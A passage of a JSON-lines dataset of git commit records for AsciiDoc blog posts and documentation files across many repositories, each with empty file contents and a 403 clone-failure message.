2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9aadcdb58e44ff8c2c662797c7fedbd20a8f7482","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c430e3c6e58c03927c9d9c24df379b389a340bbf","subject":"Update 2016-10-07-Modular-Mobile-Technology.adoc","message":"Update 2016-10-07-Modular-Mobile-Technology.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"_posts\/2016-10-07-Modular-Mobile-Technology.adoc","new_file":"_posts\/2016-10-07-Modular-Mobile-Technology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a9aa2be71aa3fb9841f4a435fa18c08d177c2c8","subject":"Update 2018-01-06-calculator-app-with-Swift.adoc","message":"Update 2018-01-06-calculator-app-with-Swift.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-06-calculator-app-with-Swift.adoc","new_file":"_posts\/2018-01-06-calculator-app-with-Swift.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5451f193b8bd4d467046dbcf9d952dd86b157854","subject":"Update 2019-09-30-Microservices-With-Nodejs.adoc","message":"Update 2019-09-30-Microservices-With-Nodejs.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2019-09-30-Microservices-With-Nodejs.adoc","new_file":"_posts\/2019-09-30-Microservices-With-Nodejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35c23aee9d623204060f88f0bfe2106b2bd9dd55","subject":"Decisions framework","message":"Decisions framework\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"DECISIONS.adoc","new_file":"DECISIONS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66e77d2f24b2d9ead4517c6df9e870a76af3c8e0","subject":"Update 2016-07-21-Another-Test-Post.adoc","message":"Update 2016-07-21-Another-Test-Post.adoc","repos":"jborichevskiy\/jborichevskiy.github.io,jborichevskiy\/jborichevskiy.github.io,jborichevskiy\/jborichevskiy.github.io,jborichevskiy\/jborichevskiy.github.io","old_file":"_posts\/2016-07-21-Another-Test-Post.adoc","new_file":"_posts\/2016-07-21-Another-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jborichevskiy\/jborichevskiy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53dd4aca2d5ea07481d4d6741d8c3211ca286d44","subject":"Update 2015-11-10-Install-Keras-to-Ubuntu-1404-x64.adoc","message":"Update 2015-11-10-Install-Keras-to-Ubuntu-1404-x64.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-10-Install-Keras-to-Ubuntu-1404-x64.adoc","new_file":"_posts\/2015-11-10-Install-Keras-to-Ubuntu-1404-x64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gajumaru4444\/gajumaru4444.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c73dc9b65b621e347ea43ec246bbd45e39d25f59","subject":"Update 2016-04-11-ip.adoc","message":"Update 2016-04-11-ip.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-11-ip.adoc","new_file":"_posts\/2016-04-11-ip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaa7e80a0a15ab13c23b4f5e0c3c850c44cb6176","subject":"y2b create post BlackBerry Z10 Unboxing \\u0026 Overview","message":"y2b create post BlackBerry Z10 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-30-BlackBerry-Z10-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-01-30-BlackBerry-Z10-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"207d45051ec35c9d773e93cd1a28373bb2b0efbb","subject":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6f6022e76fd125ff6ffeaa01e3ed5481233000e","subject":"typo","message":"typo\n\nChange-Id: I7e08220554f82019ef9f6efe0ae4ed9be8d556a6\nSigned-off-by: Yaroslav Brustinov <58a360e80ce67a871f076847d255453a99d22580@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25f5fe789063b2611acff02622812fb33233bb08","subject":"Update 2010-05-20-Crible-d-Eratosthene-en-Scala.adoc","message":"Update 2010-05-20-Crible-d-Eratosthene-en-Scala.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-05-20-Crible-d-Eratosthene-en-Scala.adoc","new_file":"_posts\/2010-05-20-Crible-d-Eratosthene-en-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4091270a54e698c84d988b8ec2f059b33a15447f","subject":"Update 2015-06-03-Running-an-Akka-Actor-forever.adoc","message":"Update 2015-06-03-Running-an-Akka-Actor-forever.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-06-03-Running-an-Akka-Actor-forever.adoc","new_file":"_posts\/2015-06-03-Running-an-Akka-Actor-forever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hhimanshu\/hhimanshu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"664039ed8660e0425c47bc1d7eca4ff0722e4d69","subject":"Update 2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","message":"Update 2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","new_file":"_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19313af130542a68122816c398af5aa6bfe57fe5","subject":"Fix problem with a command def being bulleted.","message":"Fix problem with a command def being bulleted.\n","repos":"dpquigl\/YAM","old_file":"docs\/CommandDefs.adoc","new_file":"docs\/CommandDefs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dpquigl\/YAM.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d49163fc016ed0e3c6e58b82c45b7ec9f3565d2","subject":"Init of article on gatsby and asciidoctor","message":"Init of article on gatsby and asciidoctor\n","repos":"ochaloup\/blog.chalda.cz,ochaloup\/blog.chalda.cz","old_file":"content\/posts\/2022-10-30-Gatsby-and-Asciidoctor.adoc","new_file":"content\/posts\/2022-10-30-Gatsby-and-Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ochaloup\/blog.chalda.cz.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b8a1b967381f14e8680652e0f2885764e29f60c","subject":"Add changelog","message":"Add changelog\n","repos":"jirutka\/ssh-ldap-pubkey,jirutka\/ssh-ldap-pubkey","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/ssh-ldap-pubkey.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5d8fe3dc9851e14163c87d4d9fa58f7d8b37547","subject":"johndoe.adoc: tweak formatting","message":"johndoe.adoc: tweak formatting\n\n* add section 'justification for the feature'\n* minor cosmetic tweaks\n","repos":"damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,se-edu\/addressbook-level3","old_file":"docs\/team\/johndoe.adoc","new_file":"docs\/team\/johndoe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level3.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6eb2a883b3939bc1ed1d726a0c5200e23800c07","subject":"Move from Markdown to Asciidoc for ChangeLog","message":"Move from Markdown to Asciidoc for ChangeLog\n","repos":"ccw-ide\/ccw,noncom\/ccw,noncom\/ccw,laurentpetit\/ccw,michelangelo13\/ccw,noncom\/ccw,michelangelo13\/ccw,ccw-ide\/ccw,laurentpetit\/ccw,ccw-ide\/ccw,laurentpetit\/ccw,michelangelo13\/ccw","old_file":"ChangeLog.adoc","new_file":"ChangeLog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noncom\/ccw.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e38f00a55fc3af2d6422c2a6d05dea71fa0eb4d9","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d437bc695fb206e16c1361baca05a5b39bcf898e","subject":"Update 2015-05-31-Neuigkeiten-Blog-eingerichtet.adoc","message":"Update 2015-05-31-Neuigkeiten-Blog-eingerichtet.adoc","repos":"teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io","old_file":"_posts\/2015-05-31-Neuigkeiten-Blog-eingerichtet.adoc","new_file":"_posts\/2015-05-31-Neuigkeiten-Blog-eingerichtet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teilautohall\/teilautohall.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b0ec37095107b8dbd0aeb223314e973d4c14126","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7c6cb0951d89a2c8ca095ac614cd8f55c5cd4b6","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/http-response.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/http-response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbc51c5cdf2dde940d989814dda667af71769f5c","subject":"Delete the file at '_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc'","message":"Delete the file at '_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"941b78742decbfc4c23a46be8612c8d042e88d30","subject":"clockwise vs counterclockwise","message":"clockwise vs counterclockwise\n","repos":"oskopek\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website","old_file":"blog\/2015-03-20-3BugsInTheUltimateAmericanRoadTrip.adoc","new_file":"blog\/2015-03-20-3BugsInTheUltimateAmericanRoadTrip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ddec0c3f25a07601f6f502e4b4d5a4d33c3b72d6","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e94536f9084ed023dac12a5fc89eb28a328a0f5","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a51ae71bea053d034a9b0f792d29d64aaf6c841c","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ca974145a236f46801c33e268fe2ddc000f472a","subject":"Document edge's filesystem layout","message":"Document edge's filesystem layout\n","repos":"juxt\/edge,juxt\/edge","old_file":"docs\/layout.adoc","new_file":"docs\/layout.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/edge.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf1a01957096cabe74b5c65524c4b0dbbd569ec9","subject":"Delete the file at '_posts\/2019-09-31-CSAW-CTF-2017-Qual-Serial-Misc50.adoc'","message":"Delete the file at '_posts\/2019-09-31-CSAW-CTF-2017-Qual-Serial-Misc50.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2019-09-31-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2019-09-31-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db12f9d203e913d98c06d214c288f6daa8b63711","subject":"y2b create post Betty The Headphone Junkie","message":"y2b create post Betty The Headphone Junkie","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-05-30-Betty-The-Headphone-Junkie.adoc","new_file":"_posts\/2012-05-30-Betty-The-Headphone-Junkie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8121c420a7458c10bde1d5c9ffb7e823b5b9ee2","subject":"Inclus\u00e3o de configura\u00e7\u00f5es do asciidoctor","message":"Inclus\u00e3o de configura\u00e7\u00f5es do asciidoctor\n","repos":"BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC,BD-ITAC\/BD-ITAC","old_file":"Alertas\/alertaWSClient\/src\/asciidoc\/overview.adoc","new_file":"Alertas\/alertaWSClient\/src\/asciidoc\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BD-ITAC\/BD-ITAC.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"604747823fc4848c6bb63af3ee2087e12f19e693","subject":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","message":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3ac80e6212f57c1f88d06a26afaefc3b5cca942","subject":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa80856dc6f8cc7f6b46a4f52c651437bcc03882","subject":"Update 2016-01-19-why-use-pip-and-virtualenv.adoc","message":"Update 2016-01-19-why-use-pip-and-virtualenv.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-19-why-use-pip-and-virtualenv.adoc","new_file":"_posts\/2016-01-19-why-use-pip-and-virtualenv.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1eb82924a44ad710259186bc0fc88c65d0e4878e","subject":"[docs] Add note that it is safe to stop and restart the rebalancer","message":"[docs] Add note that it is safe to stop and restart the rebalancer\n\nChange-Id: I14745e1b31565f31ff8ff7c7d465eee38f2a22bc\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11963\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Mitch Barnett <99318921b6a557d845be64243c569ae0257ad163@cloudera.com>\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a467fa9e57b2f3dec738660d155a5465ab0e1898","subject":"Add Chinese translation README 0.1","message":"Add Chinese translation README 0.1\n\nversion 0.1, according to the README file 15.03.2015\n","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"README-zh.adoc","new_file":"README-zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efc1f1a3a270a682ee1fbda2584a2b612d5c5214","subject":"creates documentation to pagination at mapping","message":"creates documentation to pagination at mapping\n","repos":"JNOSQL\/diana","old_file":"specification\/src\/main\/asciidoc\/mapping_pagination.adoc","new_file":"specification\/src\/main\/asciidoc\/mapping_pagination.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JNOSQL\/diana.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef38fda8fa3a6c3013521c66b7a55d6e34da1aa5","subject":"y2b create post Street Fighter X Tekken Special Edition Unboxing","message":"y2b create post Street Fighter X Tekken Special Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-08-Street-Fighter-X-Tekken-Special-Edition-Unboxing.adoc","new_file":"_posts\/2012-03-08-Street-Fighter-X-Tekken-Special-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d75441df5b2b26ac2aed19d03cabc5f1c431d305","subject":"Update 2015-07-15-Export-anniversaires-Facebook-vers-Google-Agenda.adoc","message":"Update 2015-07-15-Export-anniversaires-Facebook-vers-Google-Agenda.adoc","repos":"Astalaseven\/astalaseven.github.io,Astalaseven\/astalaseven.github.io,Astalaseven\/astalaseven.github.io","old_file":"_posts\/2015-07-15-Export-anniversaires-Facebook-vers-Google-Agenda.adoc","new_file":"_posts\/2015-07-15-Export-anniversaires-Facebook-vers-Google-Agenda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Astalaseven\/astalaseven.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9337b0d035a16ff8bc65bd79af77313271d68acc","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2490872d3728cfaaaf95c82c1f0a6f2819fb375","subject":"Update 2015-05-08-Test.adoc","message":"Update 2015-05-08-Test.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2015-05-08-Test.adoc","new_file":"_posts\/2015-05-08-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f526149de63301e6aefb512b6d266635295fefce","subject":"Update 2016-03-18-Test.adoc","message":"Update 2016-03-18-Test.adoc","repos":"thockenb\/thockenb.github.io,thockenb\/thockenb.github.io,thockenb\/thockenb.github.io,thockenb\/thockenb.github.io","old_file":"_posts\/2016-03-18-Test.adoc","new_file":"_posts\/2016-03-18-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thockenb\/thockenb.github.io.git\/': The requested 